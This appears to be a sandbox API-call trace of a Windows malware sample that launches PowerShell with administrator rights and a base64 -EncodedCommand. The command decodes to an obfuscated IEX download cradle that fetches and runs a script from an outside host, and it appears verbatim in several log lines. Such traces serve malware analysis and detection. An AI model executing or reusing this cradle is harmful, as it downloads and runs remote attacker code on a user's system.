	[0759.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.393] SetErrorMode (uMode=0x1) returned 0x1
	[0759.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.393] SetErrorMode (uMode=0x1) returned 0x1
	[0759.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.394] SetErrorMode (uMode=0x1) returned 0x1
	[0759.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.394] SetErrorMode (uMode=0x1) returned 0x1
	[0759.394] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.394] SetErrorMode (uMode=0x1) returned 0x1
	[0759.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.395] SetErrorMode (uMode=0x1) returned 0x1
	[0759.395] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.395] SetErrorMode (uMode=0x1) returned 0x1
	[0759.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.396] SetErrorMode (uMode=0x1) returned 0x1
	[0759.396] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.396] SetErrorMode (uMode=0x1) returned 0x1
	[0759.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.397] SetErrorMode (uMode=0x1) returned 0x1
	[0759.397] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.397] SetErrorMode (uMode=0x1) returned 0x1
	[0759.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.397] SetErrorMode (uMode=0x1) returned 0x1
	[0759.397] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.398] SetErrorMode (uMode=0x1) returned 0x1
	[0759.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.398] SetErrorMode (uMode=0x1) returned 0x1
	[0759.398] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.398] SetErrorMode (uMode=0x1) returned 0x1
	[0759.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.399] SetErrorMode (uMode=0x1) returned 0x1
	[0759.399] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.399] SetErrorMode (uMode=0x1) returned 0x1
	[0759.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.399] SetErrorMode (uMode=0x1) returned 0x1
	[0759.399] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.400] SetErrorMode (uMode=0x1) returned 0x1
	[0759.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0759.400] SetErrorMode (uMode=0x1) returned 0x1
	[0759.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.400] SetErrorMode (uMode=0x1) returned 0x1
	[0759.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0759.401] SetErrorMode (uMode=0x1) returned 0x1
	[0759.401] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.401] SetErrorMode (uMode=0x1) returned 0x1
	[0759.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0759.402] SetErrorMode (uMode=0x1) returned 0x1
	[0759.402] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.402] SetErrorMode (uMode=0x1) returned 0x1
	[0759.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0759.402] SetErrorMode (uMode=0x1) returned 0x1
	[0759.403] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.403] SetErrorMode (uMode=0x1) returned 0x1
	[0759.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0759.403] SetErrorMode (uMode=0x1) returned 0x1
	[0759.403] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0759.404] SetErrorMode (uMode=0x1) returned 0x1
	[0759.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0759.404] SetErrorMode (uMode=0x1) returned 0x1
	[0759.404] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x30b1a0
	[0759.405] FindNextFileW (in: hFindFile=0x30b1a0, lpFindFileData=0x1c80df70 | out: lpFindFileData=0x1c80df70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0759.405] FindClose (in: hFindFile=0x30b1a0 | out: hFindFile=0x30b1a0) returned 1
	[0759.406] SetErrorMode (uMode=0x1) returned 0x1
	[0759.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80e080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0759.407] SetErrorMode (uMode=0x1) returned 0x1
	[0759.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c80e290 | out: lpFileInformation=0x1c80e290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0759.407] SetErrorMode (uMode=0x1) returned 0x1
	[0759.408] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0759.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.408] CoTaskMemFree (pv=0x2f9910) 
	[0759.410] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0759.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.410] CoTaskMemFree (pv=0x2f9910) 
	[0759.413] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0759.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.414] CoTaskMemFree (pv=0x2f9910) 
	[0759.423] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0759.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.423] CoTaskMemFree (pv=0x2f9910) 
	[0760.742] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c76c0
	[0760.743] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e478, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e478) returned 0x4550
	[0760.744] CoTaskMemFree (pv=0x1b8c76c0) 
	[0760.747] GetConsoleWindow () returned 0x2053a
	[0761.618] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0761.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.618] CoTaskMemFree (pv=0x2f9910) 
	[0761.619] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0761.619] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0761.619] CoTaskMemFree (pv=0x2f9910) 
	[0761.629] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0761.629] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0761.629] CoTaskMemFree (pv=0x2f9910) 
	[0761.631] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c80e4c0 | out: pNumArgs=0x1c80e4c0) returned 0x2f0530*=""
	[0761.633] lstrlenW (lpString="-EncodedCommand") returned 15
	[0761.634] CoTaskMemAlloc (cb=0x22) returned 0x1b8ec630
	[0761.634] RtlMoveMemory (in: Destination=0x1b8ec630, Source=0x2f0552, Length=0x20 | out: Destination=0x1b8ec630) 
	[0761.634] CoTaskMemFree (pv=0x1b8ec630) 
	[0761.634] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0761.634] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8def10
	[0761.634] RtlMoveMemory (in: Destination=0x1b8def10, Source=0x2f0572, Length=0x2f2 | out: Destination=0x1b8def10) 
	[0761.634] CoTaskMemFree (pv=0x1b8def10) 
	[0761.635] LocalFree (hMem=0x2f0530) returned 0x0
	[0761.636] CoTaskMemAlloc (cb=0x804) returned 0x1b8fd4c0
	[0761.636] GetConsoleTitleW (in: lpConsoleTitle=0x1b8fd4c0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0761.636] CoTaskMemFree (pv=0x1b8fd4c0) 
	[0761.646] CoTaskMemAlloc (cb=0x38e) returned 0x2f0530
	[0761.646] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c80e420*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f468d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f468d0*(hProcess=0x398, hThread=0x34c, dwProcessId=0x21a0, dwThreadId=0x21a4)) returned 1
	[0775.854] CoTaskMemFree (pv=0x2f0530) 
	[0775.855] CloseHandle (hObject=0x34c) returned 1
	[0775.855] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c76c0
	[0775.855] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e4c8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e4c8) returned 0x4550
	[0775.856] CoTaskMemFree (pv=0x1b8c76c0) 
	[0775.859] GetCurrentProcess () returned 0xffffffffffffffff
	[0775.859] GetCurrentProcess () returned 0xffffffffffffffff
	[0775.860] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80e5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80e5a8*=0x34c) returned 1

Process:
	id = "100"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xad7f000"
	os_pid = "0x1308"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 522
	os_tid = 0x130c


Thread:
	id = 544
	os_tid = 0x13c4


Thread:
	id = 553
	os_tid = 0x13ec


Process:
	id = "101"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1868d000"
	os_pid = "0x133c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
